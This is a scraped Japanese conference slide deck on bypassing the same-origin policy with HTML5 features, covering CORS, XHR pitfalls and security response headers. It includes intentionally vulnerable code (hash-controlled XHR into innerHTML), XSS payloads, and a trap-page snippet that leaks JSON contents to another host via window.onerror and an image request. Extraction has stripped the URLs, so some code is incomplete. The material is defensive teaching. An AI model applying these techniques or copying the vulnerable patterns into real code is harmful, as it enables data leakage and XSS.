自己紹介はせがわようすけネットエージェント株式会社株式会社セキュアスカイテクノロジー技術顧問 Microsoft MVP for Consumer Security Oct

Size: px

Start display at page:

Download "自己紹介はせがわようすけネットエージェント株式会社株式会社セキュアスカイテクノロジー技術顧問 Microsoft MVP for Consumer Security Oct"

ひさともかりこめ
6 years ago
Views:

1 Bypass SOP in a time of HTML5 Jan Yosuke HASEGAWA

2 自己紹介はせがわようすけネットエージェント株式会社株式会社セキュアスカイテクノロジー技術顧問 Microsoft MVP for Consumer Security Oct

4 お知らせ

5 HTML5 調査報告 from JPCERT/CC

6 今日の話題

7 今日の話題 HTML5 時代の SOP 破りブラウザの高機能化表現力速度の向上 JS コード量の増加攻撃者対象もブラウザ上へ SOP 破りの受動的攻撃が増加

8 今日の話題オリジンの話オリジン / 同一オリジンポリシー / CORS XMLHttpRequest 意図せずクロスオリジン通信 XSS 意図せずクロスオリジン通信データ漏えい Ajaxデータを悪用してXSS Ajaxデータ内の機密情報漏えいセキュリティ関係のレスポンスヘッダ

9 オリジンの話

10 オリジンとはオリジンとは RFC6454 The Web Origin Concept スキーム + ホスト + ポートデフォルトのポートは省略正規化された表現

11 同一オリジンポリシー同一オリジンポリシー Same-Origin Policy - SOP オリジンが異なる場合に様々な制約 XHR での読み取り localstorage の読み書き範囲などなど cookie や HTTP 認証はオリジンをベースとしていない

12 Cross-Origin Resource Sharing CORS - Cross-Origin Resource Sharing オリジンを超えてリソースを共有するための統一的なルール Cross-Origin Resource Sharing HTTP access control (CORS) MDN XHR img+canvas Web Fonts など

13 XHR with CORS // var xhr = new XMLHttpRequest(); xhr.open( "GET", " true ); xhr.onreadystatechange = function(){... }; xhr.send( null ); GET / HTTP/1.1 Host: another.example.jp User-Agent: Mozilla/5.0 (Windows NT 6.1)... Origin: HTTP/ OK Date: Tue, 28 Feb :34:56 GMT Access-Control-Allow-Origin: Content-Type: text/html; charset=utf-8...

14 XHR with CORS // var xhr = new XMLHttpRequest(); xhr.open( "GET", " true ); xhr.withcredentials = true; xhr.onreadystatechange = function(){... }; xhr.send( null ); GET / HTTP/1.1 Host: another.example.jp User-Agent: Mozilla/5.0 (Windows NT 6.1)... Cookie: sessionid=135a2387bc12ee0f Origin: HTTP/ OK Date: Tue, 28 Feb :34:56 GMT Access-Control-Allow-Origin: Access-Control-Allow-Credentials: true Content-Type: text/html; charset=utf-8...

15 Images with CORS // <img src=" crossorigin="anonymous"> GET /takahiro.jpg HTTP/1.1 Host: another.example.jp User-Agent: Mozilla/5.0 (Windows NT 6.1)... Origin: HTTP/ OK Date: Tue, 28 Feb :34:56 GMT Access-Control-Allow-Origin: Content-Type: image/jpeg... Origin がつき Cookie は送信されない Canvas 経由で読み取り可能になる

16 Images with CORS // <img src=" crossorigin="use-credentials"> GET /takahiro.jpg HTTP/1.1 Host: another.example.jp User-Agent: Mozilla/5.0 (Windows NT 6.1)... Cookie: sessionid=135a2387bc12ee0f Origin: HTTP/ OK Date: Tue, 28 Feb :34:56 GMT Access-Control-Allow-Origin: Access-Control-Allow-Credentials: true Content-Type: image/jpeg... Canvas 経由で読み取り可能になる

17 Access-Control-Allow-Origin Access-Control-Allow-Origin: * 誰からでも読み取り可能 HTTP/ OK Date: Tue, 28 Feb :34:56 GMT Access-Control-Allow-Origin: * Content-Type: text/html... 機密情報を含むコンテンツの場合罠ページからも読み取られれてしまう!

18 ここまでのまとめオリジンスキームホストポートの組み合わせ同一オリジンポリシーオリジンを境界としてリソースの読み書きを保護する仕組みの総称 CORS Cross-Origin Resource Sharing オリジンを超えてリソースを共有するためのルール preflight 今回は説明を省略ブラウザを狙う攻撃は SOP 回避の受動的攻撃

19 XMLHttpRequest

20 XMLHttpRequest 言うまでもなく今どきの JS アプリの要 Lv.2によりクロスオリジン通信可能 XHR 周辺に脆弱性も多いよくある脆弱性意図せずクロスオリジン通信 XSS 意図せずクロスオリジン通信データ漏えい Ajaxデータを悪用してXSS Ajaxデータ内の機密情報漏えい

21 XMLHttpRequest (1) 意図せずクロスオリジン通信 XSS

22 XHR: 意図せずクロスオリジン通信 XSS XHR Lv.2 で脆弱になったクロスオリジン通信できない間は安全だった // var url = decodeuricomponent( location.hash.substring(1) ); var xhr = new XMLHttpRequest(); xhr.open( "GET", url, true ); xhr.onreadystatechange = function(){ if( xhr.readystate == 4 && xhr.status == 200 ){ div.innerhtml = xhr.responsetext; } }

23 XHR: 意図せずクロスオリジン通信 XSS 対策相手先を固定リストで事前に保持 // var page = decodeuricomponent( location.hash.substring(1) ); var pages = { "/news":"/news", "/comment":"/comment"}; var url = pages[ page ] "/"; //undefined のときは / を取得 var xhr = new XMLHttpRequest(); xhr.open( "GET", url, true ); xhr.onreadystatechange = function(){ if( xhr.readystate == 4 && xhr.status == 200 ){ div.innerhtml = xhr.responsetext; } }

24 XMLHttpRequest (2) 意図せずクロスオリジン通信データ漏えい

25 XHR: 意図せずクロスオリジン通信データ漏えいサーバ側で意図していないクロスオリジン通信リクエストヘッダの Origin: で送信元を確認 GET /resource HTTP/1.1 Host: example.jp Origin: この実装例は安全? 脆弱? HTTP/ OK Content-Type: text/plain Access-Control-Allow-Origin: htp://example.jp これは example.jp だけが読むことを許された機密情報です GET /resource HTTP/1.1 Host: example.jp Origin: HTTP/ Forbidden

26 XHR: 意図せずクロスオリジン通信データ漏えい攻撃者は telnet 等で任意の Origin を送信可能 Origin: ヘッダを認証に使用してはいけない GET /resource HTTP/1.1 Host: example.jp Origin: 攻撃者が telnet で入力この実装例は安全? 脆弱? HTTP/ OK Content-Type: text/plain Access-Control-Allow-Origin: htp://example.jp 脆弱これは example.jp だけが読むことを許された機密情報です

27 XHR: 意図せずクロスオリジン通信データ漏えい通常通り Cookie を使って認証 xhr.withcredentials = true; // Cookie 付きでクロスオリジンリクエストを発行 GET /rsource HTTP/1.1 Host: example.jp Origin: Cookie: sessionid=a1e223ed HTTP/ OK Content-Type: text/plain Access-Control-Allow-Origin: Access-Control-Allow-Credentials: true これは example.jp だけが読むことを許された機密情報です

28 XMLHttpRequest (3)Ajax データを使った XSS

XHR: Ajax データを使った XSS IE must die HTTP/1.

29 XHR: Ajax データを使った XSS IE must die HTTP/ OK Content-Type: application/json; charset=utf-8 { "msg" : "<script>alert(1)</script>" }

30 XHR: Ajax データを使った XSS JSON ならエスケープできなくはないけど HTTP/ OK Content-Type: application/json; charset=utf-8 { "msg" : " u003cscript u003ealert(1) u003c/script u003e" } text/plain とか text/csv とかエスケープできない

31 XHR: Ajax データを使った XSS 対策 X-Content-Type-Options を付ける HTTP/ OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff { "msg" : "<script>alert(1)</script>" } 非 HTML が HTML 扱いされることがなくなる

32 XMLHttpRequest (4)Ajax データ内の機密情報漏えい

33 XHR: Ajax データ内の機密情報漏えい JavaScript や VBScript として解釈可能な Ajax データが狙われやすい // 罠ページ内で script ソースとして読み込む <script src=" <script src=" JSON {"from" : "a@example.com"}

34 XHR: Ajax データ内の機密情報漏えい JSON 配列を VBScript として読み込む失敗エラーメッセージに配列の内容 HTTP/ OK Content-Type: application/json; charset=utf-8 [ "secret", "message", "is", "here" ] // 攻撃者の用意した罠ページ <script src=" language="vbscript"></script>

35 XHR: Ajax データ内の機密情報漏えい JSON 配列を VBScript として読み込みエラーメッセージに配列の内容が含まれる window.onerror で捕捉 <script> window.onerror = function( e ){ document.getelementbyid( "img" ).setattribute( "src", " + e ); } </script> <script src=" language="vbscript"></script> GET 型が一致しません :%20' %20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1 Referer: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

36 XHR: Ajax データ内の機密情報漏えい対策 X-Content-Type-Options を付ける HTTP/ OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff [ "secret", "message", "is", "here" ]

37 セキュリティ関係のレスポンスヘッダ

38 セキュリティ関係のレスポンスヘッダ使いこなすことでよりセキュアに X-XSS-Protection X-Content-Type-Options X-Frame-Options Content-Security-Policy X-Download-Options Strict-Transport-Security

39 セキュリティ関係のレスポンスヘッダ X-XSS-Protection

40 X-XSS-Protection XSS 保護機能の制御 IE,Chrome,Opera,Safariで有効 XSS 保護機能をそのページのみ無効にする X-XSS-Protection: 0 XSS 保護機能を明示的に有効にする ( デフォルト有効になっている ) X-XSS-Protection: 1 XSS 保護機能を有効にし XSS 検知時に空白画面を表示 X-XSS-Protection: 1; mode=block

41 X-XSS-Protection XSS フィルターを無効に設定やめて!

42 X-XSS-Protection XSS フィルターの誤検知のエラーを消すには該当ページに XSS がないか慎重に検査したうえでそのページのみ X-XSS-Protection:0 を指定ブラウザの設定変更を指示しないで!

43 セキュリティ関係のレスポンスヘッダ X-Content-Type-Options

44 X-Content-Type-Options Content-Type を厳格に扱う非 HTML を HTML 扱いしない JSON や CSV による XSS の防止 Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff { "message", "<script>alert(1)</script>" } 非 JS を <script src> として読み込まない script src 経由での情報漏えい防止 Firefox Chrome などでも Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff [ "secret", "message", "is", "here" ]

45 X-Content-Type-Options 副作用はほとんどないので全コンテンツにつけるべき稀有な副作用例 :JSONP/JSON で共通処理 Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff { "message", "<script>alert(1)</script>" } Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff callback( { "message", "<script>alert(1)</script>" } ) <script src="api/jsonp?cb=callback"></script> 失敗する

46 セキュリティ関係のレスポンスヘッダ X-Frame-Options

47 X-Frame-Options クリックジャッキング標的サイトを透明に重ね意図しないクリック等を引き起こす攻撃透明表示の標的サイト罠サイト

48 X-Frame-Options クリックジャッキング対策 iframe,frame 等での埋め込みを禁止する全ての埋め込みを禁止 X-Frame-Options: DENY 同一オリジン以外からの埋め込みを禁止 X-Frame-Options: SAMEORIGIN 指定オリジン以外からの埋め込みを禁止 X-Frame-Options: ALLOW-FROM

49 X-Frame-Options X-Frame-Options: ALLOW-FROM X-Frame-Options: ALLOW-FROM からの埋込みのみ許可 ALLOW-FROM に指定できるオリジンはひとつだけ複数のオリジンからの埋め込み許可はそのままではできない Firefox のみスペース区切りで複数オリジンの指定可能

50 X-Frame-Options ALLOW-FROM の複数オリジン対応呼出し元オリジンごとに識別子を URL に付与 // 上 <iframe src=" # child.example.jp/ my $allows = { p1 => ' }; my $from = $allows->{ $params->{from} }; if( $from ){ print "X-Frame-Options: ALLOW-FROM $from n"; }else{ print "X-Frame-Options: DENY n"; }

51 セキュリティ関係のレスポンスヘッダ Content-Security-Policy

52 Content-Security-Policy ヘッダで指定されたソースからしか画像や JS を読み込めなくする HTTP/ OK Content-Security-Policy: default-src 'self'; image-src *; Content-Type: text/html; charset=utf-8 Chrome 拡張や FirefoxOS アプリの開発時にイラッとするアレ使いこなせば XSS も怖くないけれど実際の運用は超たいへん

53 セキュリティ関係のレスポンスヘッダ X-Download-Options

X-Download-Options IE8 以降でダウンロード時に開くボタンを非表示 HTTP/1.

54 X-Download-Options IE8 以降でダウンロード時に開くボタンを非表示 HTTP/ OK Content-Disposition: attachment; filename="index.html" X-Download-Options: noopen <html><script>... X-Download-Options なし X-Download-Options あり

55 X-Download-Options ダウンロード時の開くボタン非表示添付ファイルによる蓄積型の XSS を予防することができる安全なコンテンツをユーザーが直接開くことができなくなるので利便性は下がる不特定多数のユーザーが添付ファイルを掲載できる Web アプリでは一考の価値あり

56 セキュリティ関係のレスポンスヘッダ Strict-Transport-Security

57 Strict-Transport-Security HTTPS を強制するための指令 HTTP/ OK Strict-Transport-Security: max-age= HTTP/ OK Strict-Transport-Security: max-age= ; includesubdomains これ以降の HTTP へのアクセスは HTTPS に置き換わる max-age は有効期間を秒数で指定 includesubdomains が指定されるとサブドメインも対象

58 Strict-Transport-Security HTTPSサイトのみがStrict-Transport- Securityヘッダを返す HTTP/ OK Strict-Transport-Security: max-age= HTTP はすでに汚染されているかもしれないので Firefox Chrome などは常に HTTPS で通信する "preload HSTS" のリストを持っている

59 Strict-Transport-Security Preload HSTS list Firefox Chrome は常に HTTPS で通信するサイトのリストを持っている申請すれば掲載してもらえる ( 常時 SSL 化!) cybozu.com を真に常時 SSL にする話 Cybozu Inside Out サイボウズエンジニアのブログ

60 質問タイム Question?

61 Question? 質問 @hasegawayosuke

自己紹介 XSS のほうから来ました author of jjencode, aaencode

自己紹介 XSS のほうから来ました author of jjencode, aaencode ぼくたちの愛した IE8 はせがわようすけ @hasegawayosuke 自己紹介はせがわようすけ @hasegawayosuke XSS のほうから来ました http://utf-8.jp/ author of jjencode, aaencode さよなら Internet Explorer 8 Internet Explorer 8 タイムライン 2005-06 年 Ajax Web 2.0

自己紹介 はせがわようすけ ネットエージェント株式会社 株式会社セキュアスカイ テクノロジー技術顧問 Microsoft MVP for Consumer Security Oct

自己紹介はせがわようすけネットエージェント株式会社株式会社セキュアスカイテクノロジー技術顧問 Microsoft MVP for Consumer Security Oct